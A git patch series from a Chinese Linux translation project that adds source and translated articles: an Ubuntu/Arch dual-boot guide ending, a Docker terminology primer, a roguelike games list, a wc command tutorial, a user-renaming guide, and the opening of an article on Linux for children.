+It should take a while to download and set it up depending on the internet speed you have. + + [![install arch linux base](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/install-arch-linux-base.png?1514473056)][32] + +After the step is complete, the Archlinux base installation is completed. + +After installing the Arch Linux base, create a fstab file using the command: + +genfstab -U /mnt >> /mnt/etc/fstab + + [![create fstab in arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/create-fstab-file-in-arch-linux.png?1514473226)][33] + +​After that you need to verify the fstab file entries using: + +cat /mnt/etc/fstab + + [![cat fstab file data terminal](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/cat-fstab-file-data-terminal.png?1514473304)][34] + +### ​Configuring Arch Linux: the basic configuration + +You will need to configure the following upon installation: + +1. The system language and the system locales + +2. The system timezones + +3. Root user password + +4. Set a hostname + +Firstly, you will need to switch to the newly installed base by changing root into the system using the command: + +arch-chroot /mnt + +#### The system Language and the system locale + +You will then have to configure the system language. You will have to uncomment en_UTF-8 UTF-8 and the localization you need in /etc/local.gen + +Type: + +nano /etc/local.gen + +Then uncomment the en_UTF-8 UTF-8 + +Then type: + +locale-gen + +To generate the localization settings as follows: + + [![generate localization arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/generate-localization-arch-linux.png?1514473406)][35] You will need to set the LANG variable in locale.conf accordingly, for example: + +nano /etc/locale.conf + +​Then change to: + +LANG=en_US.UTF-8 + +If you set the keyboard layout, make the changes persistent in vconsole.conf: + +nano /etc/vconsole.conf + +​Then change to: + +KEYMAP=us-eng + +#### 2\. The system timezones + +​You will need to set the time zone using + +ln -sf /usr/share/zoneinfo/Region/City /etc/localtime + +To see the available time zones, you can use the following command in the terminal: + +Note region is shown in blue below in the screenshot: + +ls /usr/share/zoneinfo + + [![setup zonefile in arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/setup-zonefile-in-arch-linux.png?1514473483)][36] [![setup country zonefile](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/setup-country-zonefile_orig.png)][37] Run hwclock command as follows to generate /etc/adjtime(assumes the hardware clock is set to UTC.): + +# hwclock --systohc + +#### 3\. Root password + +​To set a new password for the Arch Linux installation set root password using: + +Passwd + +​Supply a new password and confirm the password to set the root password. + + [![setup arch linux root password](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/setup-arch-linux-root-password.png?1514473649)][38] + +#### 4\. Set a hostname and configure network + +​You will need to create the hostname file: + +nano /etc/hostname + + [![set arch linux hostname](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/set-arch-linux-hostname.png?1514473741)][39] + +Change the name to your username: + + [![set arch linux username](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/set-arch-linux-username.png?1514473822)][40] Then add a matching entry to hosts: + +nano /etc/hosts + +127.0.0.1 localhost.localdomain localhost + +::1 localhost.localdomain localhost + +127.0.1.1 LinuxandUbuntu.localdomain LinuxandUbuntu + +​ + +You will need to make the network connections persistent thus use: + +systemctl enable dhcpd + +#### Grub configuration + +Then reboot the machine and enter into Ubuntu to configure the grub. + +You will type: + +reboot + + [![reboot system after arch linux installation](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/reboot-system-after-arch-linux-installation.png?1514474180)][41] + +The Arch Linux installation still doesn’t appear therefore we need to install it using update-grub in ubuntu. + + [![ubuntu grub menu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/ubuntu-grub-menu.png?1514474302)][42] Open a terminal in Ubuntu and type: + +sudo update-grub + +It should update the grub to include Arch Linux. + +### Conclusion + +Congratulations you have successfully set up Ubuntu and Arch Linux to dual boot. The Ubuntu installation is easy but the Arch Linux installation is a challenge for new Linux users. I tried making this tutorial as simple as it can be. But if you have any question on the article, let me know in the comment section below. Also share this article with your friends and help them learn Linux. + +-------------------------------------------------------------------------------- + +via: http://www.linuxandubuntu.com/home/dual-boot-ubuntu-and-arch-linux + +作者:[LinuxAndUbuntu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxandubuntu.com +[1]:http://www.linuxandubuntu.com/home/etcher-burn-images-to-sd-card-make-bootable-usb +[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bootable-ubuntu-usb-etcher-image-writer_orig.jpg +[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-ubuntu-usb-bootable-in-linux_orig.jpg +[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/live-ubuntu-boot_orig.jpg +[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-usb-from-live-usb_orig.jpg +[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/custom-partition-hd-install-ubuntu_orig.jpg +[7]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-swap-partition-ubuntu_orig.jpg +[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-root-partition_orig.jpg +[9]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-ubuntu-timezone_orig.jpg +[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-select-location-keyboard-layout_orig.jpg +[11]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-username-system-name-ubuntu-install_orig.jpg +[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finishing_orig.jpg +[13]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finished_orig.jpg +[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/remove-installation-media-after-ubuntu_orig.jpg +[15]:http://www.linuxandubuntu.com/home/arch-linux-take-your-linux-knowledge-to-next-level-review +[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-installation-boot-menu_orig.jpg +[17]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-tty1-linux_orig.png +[18]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-ping-check-internet-connection_orig.png +[19]:http://www.linuxandubuntu.com/home/how-to-setup-a-wifi-in-arch-linux-using-terminal +[20]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-partition-disk-with-cfdisk_orig.png +[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/partition-free-space-swap-arch-linux_orig.png +[22]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-partition_orig.png +[23]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-arch-linux-root-as-primary-partition_orig.png +[24]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-partition-to-install-arch_orig.png +[25]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-confirm-create-partition_orig.png +[26]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/quit-cfdisk-arch-linux_orig.png +[27]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/confirm-partition-changes_orig.png +[28]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/complete-arch-linux-installation-partition_orig.png +[29]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mount-base-partition-in-arch-linux.png +[30]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mount-home-partition-arch-linux.png +[31]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/make-mount-home-directory.png +[32]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/install-arch-linux-base.png +[33]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/create-fstab-file-in-arch-linux.png +[34]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/cat-fstab-file-data-terminal.png +[35]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/generate-localization-arch-linux.png +[36]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/setup-zonefile-in-arch-linux.png +[37]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/setup-country-zonefile_orig.png +[38]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/setup-arch-linux-root-password.png +[39]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/set-arch-linux-hostname.png +[40]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/set-arch-linux-username.png +[41]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/reboot-system-after-arch-linux-installation.png +[42]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/ubuntu-grub-menu.png From 616af8feac9ba02fc7d19e8e71443cb510e60ca1 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 14:39:32 +0800 Subject: [PATCH 0882/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Container=20Bas?= =?UTF-8?q?ics:=20Terms=20You=20Need=20to=20Know?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ontainer Basics- Terms You Need to Know.md | 48 +++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 sources/tech/20171228 Container Basics- Terms You Need to Know.md diff --git a/sources/tech/20171228 Container Basics- Terms You Need to Know.md b/sources/tech/20171228 Container Basics- Terms You Need to Know.md new file mode 100644 index 0000000000..a68e33a5d9 --- /dev/null +++ b/sources/tech/20171228 Container Basics- Terms You Need to Know.md @@ -0,0 +1,48 @@ +Container Basics: Terms You Need to Know +====== + +![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/containers-krissia-cruz.jpg?itok=-TNPqdcp) + +[In the previous article][1], we talked about what containers are and how they breed innovation and help companies move faster. And, in the following articles in this series, we will discuss how to use them. Before we dive more deeply into the topic, however, we need to understand some of the terms and commands used in the container world. Without a confident grasp of this terminology, things could get confusing. + +Let's explore some of the basic terms used in the [Docker][2] container world. + +**Container** **:** What exactly is container? It 's a runtime instance of a Docker image. It contains a Docker image, an execution environment, and instructions. It's totally isolated from the system so multiple containers can run on the system, completely oblivious of each other. You can replicate multiple containers from the same image and scale the service when the demand is high and nuke those containers when demand is low. + +**Docker Image** **:** This is no different from the image of a Linux distribution that you download. It's a package of dependencies and information for creating, deploying, and executing a container. You can spin up as many containers as you want in a matter of seconds. Each behaves exactly the same. Images are built on top of one another in layers. Once an image is created, it doesn't change. If you want to make changes to your container, you simply create a new image and deploy new containers from that image. + +**Repository (repo)** **:** Linux users will already be familiar with the term repository; it's a reservoir where packages are stored that can be downloaded and installed on a system. In the context of Docker containers, the only difference is that it hosts Docker images which are categorized via labels. You can have different variants of the same applications or different versions, all tagged appropriately. + +**Registry** **:** Think of this as like GitHub. It 's an online service that hosts and provides access to repositories of docker images. DockerHub, for example is the default registry for public images. Vendors can upload their repositories on DockerHub so that their customers can download and use official images. Some companies offer their own registries for their images. Registries don't have to be run and managed by third party vendors. Organizations can have on-prem registries to manage organization-wide access to repositories. + +**Tag** **:** When you create a Docker image, you can tag it appropriately so that different variants or versions can be easily identified. It's no different from what you see in any software package. Docker images are tagged when you add them to the repository. + +Now that you have an understanding of the basics, the next phase is understanding the terminology used when working with actual Docker containers. + +**Dockerfile** **:** This is a text file that comprises the commands that are executed manually in order to build a Docker image. These instructions are used by Docker to automatically build images. + +**Build** **:** This is the process that creates an image from Dockerfile. + +**Push** **:** Once the image is created, "push" is the process to publish that image to the repository. The term is also used as part of a command that we will learn in the next articles. + +**Pull** **:** A user can retrieve that image from repository through the "pull" process. + +**Compose** **:** Most complex applications comprise more than one container. Compose is a command-line tool that 's used to run a multi-container application. It allows you to run a multi-container application with one command. It eases the headache of running multiple containers needed for that application. + +### Conclusion + +The scope of container terminology is massive, but these are some basic terms that you will frequently encounter. The next time you see these terms, you will know exactly what they mean. In the next article, we will get started working with Docker containers. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/intro-to-linux/2017/12/container-basics-terms-you-need-know + +作者:[Swapnil Bhartiya][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/arnieswap +[1]:https://www.linux.com/blog/intro-to-linux/2017/12/what-are-containers-and-why-should-you-care +[2]:https://www.docker.com/ From 0b210805c681252bef5a0cbb68274f3cd29eef02 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 14:45:08 +0800 Subject: [PATCH 0883/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Excellent=20Fre?= =?UTF-8?q?e=20Roguelike=20Games?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...20171229 Excellent Free Roguelike Games.md | 71 +++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 sources/tech/20171229 Excellent Free Roguelike Games.md diff --git a/sources/tech/20171229 Excellent Free Roguelike Games.md b/sources/tech/20171229 Excellent Free Roguelike Games.md new file mode 100644 index 0000000000..0304b83d05 --- /dev/null +++ b/sources/tech/20171229 Excellent Free Roguelike Games.md @@ -0,0 +1,71 @@ +Excellent Free Roguelike Games +====== +![Dungeon][1] + +Roguelike is a sub-genre of role-playing games. It literally means "a game like Rogue". Rogue is a dungeon crawling video game, first released in 1980 by developers Michel Toy, Glenn Wichman and Ken Arnold. The game stood out from the crowd by being fiendishly addictive. The game's goal was to retrieve the Amulet of Yendor, hidden deep in the 26th level, and ascend back to the top, all set in a world based on Dungeons & Dragons. + +The game is rightly considered to be a classic, formidably difficult yet compelling addictive. While it was popular in college and university campuses, it wasn't a big seller. At the time of its release, Rogue wasn't published under an open source license, which led to many clones being developed. + +There is no exact definition of a roguelike, but this type of game typically has the following characteristics: + + * High fantasy narrative background + * Procedural level generation. Most of the game world is generated by the game for every new gameplay session. This is meant to encourage replayability + * Turn-based dungeon exploration and combat + * Tile-based graphics that are randomly generated + * Random conflict outcomes + * Permanent death - death works realistically, once you're gone, you're gone + * High difficulty + + + +This article compiles a wide selection of roguelike games available for Linux. If you enjoy addictive gameplay with real intensity, I heartily recommended downloading these games. Don't be put off by the primitive graphics offered by many of the games, you'll soon forget the visuals once you get immersed in playing. Remember, in roguelikes game mechanics tend to be the primary focus, with graphics being a welcome, but not essential, addition. + +There are 16 games recommended here. All of the games are available to download without charge, and almost all are released under an open source license. +| **Roguelike Games** | +| --- | +| **[Dungeon Crawl Stone Soup][1]** | A continuation of Linley’s Dungeon Crawl | +| **[Prospector][2]** | Roguelike game set in a science fiction universe | +| **[Dwarf Fortress][3]** | Adventure and Dwarf Fortress modes | +| **[NetHack][4]** | Wonderfully silly, and addictive Dungeons and Dragons-style adventure game | +| **[Angband][5]** | Along the lines of Rogue and NetHack. It is derived from the games Moria and Umoria | +| **[Ancient Domains of Mystery][6]** | Very mature Roguelike game | +| **[Tales of Maj’Eyal][7]** | Features tactical turn-based combat and advanced character building | +| **[UnNetHack][8]** | Inspired fork of NetHack | +| **[Hydra Slayer][9]** | Roguelike game based on mathematical puzzles | +| **[Cataclysm DDA][10]** | Post-apocalyptic roguelike, set in the countryside of fictional New England | +| **[Brogue][11]** | A direct descendant of Rogue | +| **[Goblin Hack][12]** | Inspired by the likes of NetHack, but faster with fewer keys | +| **[Ascii Sector][13]** | 2D trading and space flight simulator with roguelike action | +| **[SLASH'EM][14]** | Super Lotsa Added Stuff Hack - Extended Magic | +| **[Everything Is Fodder][15]** | Seven Day Roguelike competition entry | +| **[Woozoolike][16]** | A simple space exploration roguelike for 7DRL 2017. | + + +-------------------------------------------------------------------------------- + +via: https://www.linuxlinks.com/excellent-free-roguelike-games/ + +作者:[Steve Emms][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxlinks.com/author/linuxlinks/ +[1]:https://www.linuxlinks.com/dungeoncrawlstonesoup/ +[2]:https://www.linuxlinks.com/Prospector-roguelike/ +[3]:https://www.linuxlinks.com/dwarffortress/ +[4]:https://www.linuxlinks.com/nethack/ +[5]:https://www.linuxlinks.com/angband/ +[6]:https://www.linuxlinks.com/ADOM/ +[7]:https://www.linuxlinks.com/talesofmajeyal/ +[8]:https://www.linuxlinks.com/unnethack/ +[9]:https://www.linuxlinks.com/hydra-slayer/ +[10]:https://www.linuxlinks.com/cataclysmdda/ +[11]:https://www.linuxlinks.com/brogue/ +[12]:https://www.linuxlinks.com/goblin-hack/ +[13]:https://www.linuxlinks.com/asciisector/ +[14]:https://www.linuxlinks.com/slashem/ +[15]:https://www.linuxlinks.com/everything-is-fodder/ +[16]:https://www.linuxlinks.com/Woozoolike/ +[17]:https://i2.wp.com/www.linuxlinks.com/wp-content/uploads/2017/12/dungeon.jpg?resize=300%2C200&ssl=1 From 48f343e7145ef1544726c455d3c89ebc4d1dcceb Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 14:50:23 +0800 Subject: [PATCH 0884/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20wc=20Co?= =?UTF-8?q?mmand=20Explained=20for=20Beginners=20(6=20Examples)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...nd Explained for Beginners (6 Examples).md | 127 ++++++++++++++++++ 1 file changed, 127 insertions(+) create mode 100644 sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md diff --git a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md new file mode 100644 index 0000000000..7b4143473f --- /dev/null +++ b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md @@ -0,0 +1,127 @@ +Linux wc Command Explained for Beginners (6 Examples) +====== + +While working on the command line, sometimes you may want to access the number of words, byte counts, or even newlines in a file. If you are looking for a tool to do this, you'll be glad to know that in Linux, there exists a command line utility - dubbed **wc** \- that does all this for you. In this article, we will be discussing this tool through easy to understand examples. + +But before we jump in, it's worth mentioning that all examples provided in this tutorial have been tested on Ubuntu 16.04. + +### Linux wc command + +The wc command prints newline, word, and byte counts for each input file. Following is the syntax of this command line tool: + +wc [OPTION]... [FILE]... + +And here's how wc's man page explains it: +``` +Print newline, word, and byte counts for each FILE, and a total line if more than one FILE is +specified. A word is a non-zero-length sequence of characters delimited by white space. With no +FILE, or when FILE is -, read standard input. +``` + +The following Q&A-styled examples will give you an even better idea about the basic usage of wc. + +Note: We'll be using a file named file.txt as the input file in all our examples. Following is what the file contains: +``` +hi +hello +how are you +thanks. +``` + +### Q1. How to print the byte count + +Use the **-c** command line option to print the byte count. + +wc -c file.txt + +Here's the output this command produced on our system: + +[![How to print the byte count][1]][2] + +So the file contains 29 bytes. + +### Q2. How to print the character count + +To print the number of characters, use the **-m** command line option. + +wc -m file.txt + +Here's the output this command produced on our system: + +[![How to print the character count][3]][4] + +So the file contains 29 characters. + +### Q3. How to print the newline count + +Use the **-l** command line option to print the number of newlines in the file. + +wc -l file.txt + +Here's the output in our case: + +[![How to print the newline count][5]][6] + +### Q4. How to print the word count + +To print the number of words present in the file, use the **-w** command line option. + +wc -w file.txt + +Following the output the command produced in our case: + +[![How to print the word count][7]][8] + +So this reveals there are 6 words in the file. + +### Q5. How to print the maximum display width or length of longest line + +In case you want to print the length of the longest line in the input file, use the **-L** command line option. + +wc -L file.txt + +Here's the output the command produced in our case: + +[![How to print the maximum display width or length of longest line][9]][10] + +So the length of the longest file in our file is 11. + +### Q6. How to read input file name(s) from a file + +In case you have multiple file names, and you want wc to read them from a file, then use the **\--files0-from** option. + +wc --files0-from=names.txt + +[![How to read input file name\(s\) from a file][11]][12] + +So you can see that the wc command, in this case, produced lines, words, and characters count for file.txt in the output. The name file.txt was mentioned in the names.txt file. It's worth mentioning that to successfully use this option, names written the file should be NUL terminated - you can generate this character by typing Ctrl+v followed by Ctrl+Shift+@. + +### Conclusion + +As you'd agree, wc is a simple command, both from understanding and usage purposes. We've covered pretty much all command line options the tool offers, so you should be ready to use the tool on a daily basis once you practice whatever we've explained here. For more info on wc, head to its [man page][13]. + + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/linux-wc-command-explained-for-beginners-6-examples/ + +作者:[Himanshu Arora][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com +[1]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-c-option.png +[2]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-c-option.png +[3]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-m-option.png +[4]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-m-option.png +[5]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-l-option.png +[6]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-l-option.png +[7]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-w-option.png +[8]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-w-option.png +[9]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-L-option.png +[10]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-L-option.png +[11]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-file0-from-option.png +[12]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-file0-from-option.png +[13]:https://linux.die.net/man/1/wc From a18fd31b8e4e474efcdc53d3b538ecccc47312bc Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 18:15:14 +0800 Subject: [PATCH 0885/1627] translate done: 20171128 How to rename user in Linux (also rename group - home directory).md --- ...ux (also rename group - home directory).md | 64 ---------------- ...ux (also rename group - home directory).md | 76 +++++++++++++++++++ 2 files changed, 76 insertions(+), 64 deletions(-) delete mode 100644 sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md create mode 100644 translated/tech/20171128 How to rename user in Linux (also rename group - home directory).md diff --git a/sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md b/sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md deleted file mode 100644 index 30a65a62ad..0000000000 --- a/sources/tech/20171128 How to rename user in Linux (also rename group - home directory).md +++ /dev/null @@ -1,64 +0,0 @@ -translating by lujun9972 -How to rename user in Linux (also rename group & home directory) -====== -We might have come across a situation where we might want to rename user in Linux system, for whatever reasons. We can easily rename user in Linux & also we can rename the home directory or its UID as well. - -In this short tutorial, we will be discussing these things only. Let's start by renaming user in Linux first, -**(Recommended Read:[How to use FIND command to locate anything in Linux][1])** -### Rename user in Linux - -For renaming user in Linux systems, we will use ** 'usermod'** command. Syntax for the command is, - - **$ usermod -l new_username old_username** - -For example, if we have a user named ** 'dan'** & want to rename it to **' susan'**, execute the following command from terminal; - - **$ sudo usermod -l susan dan** - -This will only change the username & everything else, like group, home directory, UID will remain same. - - **Note:-** You should need to logged out from the account you are trying to rename. You can also kill all the processes running for that user, to do so execute the following command, - - **$ sudo pkill -u dan** - - **$ sudo pkill -9 -u dan** - -### Renaming Home directory - -For renaming home directory to correspond to the renamed user, we use ** '-d'** option with **' usermod'** command., - - **$ sudo usermod -d /home/susan -m susan** - -### Changing UID for the user - -To change the UID of the user , execute the following command, - - **$ sudo usermod -u 2000 susan** - -where **' 2000'** is the new UID for user. - -### Renaming the group - -To rename the group from ** 'dan'** to **' susan**', we will use **' groupmod'** command. Use the following command to rename the group, - - **$ groupmod -n susan dan** - -Once we have made the required changes, we can than check the changes made using the ** 'id'** command, - - **$ id susan** - -With this we end this tutorial on how to rename user in Linux. Please let us know if you have any question or any issue or if you do have any suggestion, please do let us know that as well. - - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/rename-user-in-linux-rename-home-directory/ - -作者:[Shusain][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com/author/shsuain/ -[1]:http://linuxtechlab.com/use-of-find-command/ diff --git a/translated/tech/20171128 How to rename user in Linux (also rename group - home directory).md b/translated/tech/20171128 How to rename user in Linux (also rename group - home directory).md new file mode 100644 index 0000000000..e489cf6380 --- /dev/null +++ b/translated/tech/20171128 How to rename user in Linux (also rename group - home directory).md @@ -0,0 +1,76 @@ +Linux 下如何修改用户名(同时修改用户组名和 home 目录) +====== +有时候,由于某些原因,我们可能会需要重命名用户名。我们可以很容易地修改用户名以及对应的 home 目录和 UID。 + +本教程将会讨论这些东西。让我们先从修改用户名开始, +**(推荐阅读:[Linux 下如何用 FIND 命令查找想要东西的路径 ][1])** +### 修改用户名 + +我们使用 `usermod` 来修改用户名。其语法为, + +``` +$ usermod -l new_username old_username +``` + +举个例子,假设我们有一个名叫 `dan` 的用户想要重命名为 `susan`,那么在终端下执行下面命令; + +``` +$ sudo usermod -l susan dan +``` + +这只会更改用户名,而其他的东西,比如用户组,home 目录,UID 等都保持不变。 + + **注意:-** 你需要从要改名的帐号中登出并杀掉该用户的所有进程,要杀掉该用户的所有进程可以执行下面命令, + +``` +$ sudo pkill -u dan +$ sudo pkill -9 -u dan +``` + +### 修改 Home 目录 + +要同时更改 home 目录,我们需要在执行 `usermod` 命令的同时加上 `-d` 选项, + +``` +$ sudo usermod -d /home/susan -m susan +``` + +### 更改用户 UDI + +执行下面命令修改用户 UID, + +``` +$ sudo usermod -u 2000 susan +``` + +这里 `2000` 就是用户的新 UID。 + +### 修改用户组名 + +要把用户组名从 `dan` 修改为 `susan`,我们需要使用 `groupmod` 命令。使用下面命令来修改用户组名, + +``` +$ groupmod -n susan dan +``` + +做完修改后,可以使用 `id` 命令来检查, + +``` +$ id susan +``` + +这篇教导如何修改用户名的指南就此结束了。有任何疑问或建议,欢迎给我们留言。 + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/rename-user-in-linux-rename-home-directory/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/use-of-find-command/ From 393b8a6b4d29aa23ef740181c5e5b32de3210d8c Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 18:48:23 +0800 Subject: [PATCH 0886/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Conf?= =?UTF-8?q?igure=20Linux=20for=20Children?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...226 How to Configure Linux for Children.md | 143 ++++++++++++++++++ 1 file changed, 143 insertions(+) create mode 100644 sources/tech/20171226 How to Configure Linux for Children.md diff --git a/sources/tech/20171226 How to Configure Linux for Children.md b/sources/tech/20171226 How to Configure Linux for Children.md new file mode 100644 index 0000000000..318e4126a7 --- /dev/null +++ b/sources/tech/20171226 How to Configure Linux for Children.md @@ -0,0 +1,143 @@ +How to Configure Linux for Children +====== + +![](https://www.maketecheasier.com/assets/uploads/2017/12/keep-kids-safe-online-hero.jpg) + +If you've been around computers for a while, you might associate Linux with a certain stereotype of computer user. How do you know someone uses Linux? Don't worry, they'll tell you. + +But Linux is an exceptionally customizable operating system. This allows users an unprecedented degree of control. In fact, parents can set up a specialized distro of Linux for children, ensuring children don't stumble across dangerous content accidentally. While the process is more prolonged than using Windows, it's also more powerful and durable. Linux is also free, which can make it well-suited for classroom or computer lab deployment. + +## Linux Distros for Children + +These Linux distros for children are built with simplified, kid-friendly interfaces. An adult will need to install and set up the operating system at first, but kids can run the computer entirely alone. You'll find large colorful interfaces, plenty of pictures and simple language. + +Unfortunately, none of these distros are regularly updated, and some are no longer in active development. That doesn't mean they won't work, but it does make malfunctions more likely. + +![qimo-gcompris][1] + + +### 1. Edubuntu + +[Edubuntu][2] is an education-specific fork of the popular Ubuntu operating system. It has a rich graphical environment and ships with a lot of educational software that's easy to update and maintain. It's designed for children in middle and high school. + +### 2. Ubermix + +[Ubermix][3] is designed from the ground up with the needs of education in mind. Ubermix takes all the complexity out of student devices by making them as reliable and easy-to-use as a cell phone without sacrificing the power and capabilities of a full operating system. With a turn-key, five-minute installation, twenty-second quick recovery mechanism, and more than sixty free applications pre-installed, ubermix turns whatever hardware you have into a powerful device for learning. + +### 3. Sugar + +[Sugar][4] is the operating system built for the One Laptop Per Child initiative. Sugar is pretty different from normal desktop Linux, with a heavy bias towards classroom use and teaching programming skills. + + **Note** : do note that there are several more Linux distros for kids that we didn't include in the list above because they have not been actively developed or were abandoned a long time ago. + +## Content Filtering Linux for Children + +The best tool for protecting children from accessing inappropriate content is you, but you can't be there all the time. Content filtering via proxy filtering sets up certain URLs as "off limits." There are two main tools you can use. + +![linux-for-children-content-filtering][5] + +### 1. DansGuardian + +[DansGuardian][6], an open-source content filter that works on virtually every Linux distro, is flexible and powerful, requiring command-line setup with a proxy of your choice. If you 